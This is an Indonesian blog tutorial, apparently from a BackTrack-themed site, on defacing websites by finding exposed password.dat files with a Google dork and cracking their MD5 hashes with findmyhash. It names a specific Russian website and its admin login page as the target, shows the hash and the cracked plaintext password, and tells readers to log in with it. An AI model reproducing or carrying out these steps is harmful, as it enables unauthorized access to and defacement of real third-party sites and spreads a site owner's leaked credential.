Info BackTrack

Linux & Security Tutorial

Memanfaatkan md5 Web dengan Findmyhash


Nah kali ini kita akan membahas masalah security web atau biasa kita kenal deface web. Oke langsung aja, bahan utama kita hanya google  dan ./findmyhash (uda adai backtrack).

nah kita langsung cari di kotak penulusuran dork di google.co.id :

filetype:dat "password.dat" |password.dat files

nah kalo uda di dork it langsung open link new tab aja, biar data-data md5 target ketemu. kebetulan saya dapat ne web rusia.. yuukk kita kerjain🙂 .

(1)  Target http://javascript.svoisait.ru/

#TARGET http://javascript.svoisait.ru/opros/admin.php

1

dork : filetype:dat "password.dat" |password.dat files

2

kita bisa mencari halaman Login dan MD5 dengan bantuan ./w3af atau ./uniscan (aplikasi tsb sudah ada pada backtrack 5)

 (3)  ketik di terminal:
</div>
<div> cd /pentest/passwords/findmyhash</div>
<div>python ./findmyhash.py md5 -h 8b3cdaaeb1649961a2702a5707a6bcf0</div>
<div>
3
 (4)  Hasil Cracknya uda kliatan***** HASH CRACKED!! *****
The original string is: kerchmaka passwordnya : kerch
4
(5)  #nah Seperti keterangan nomor 1, kita tinggal Login aja
http://javascript.svoisait.ru/opros/admin.php
password : kerch
5

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: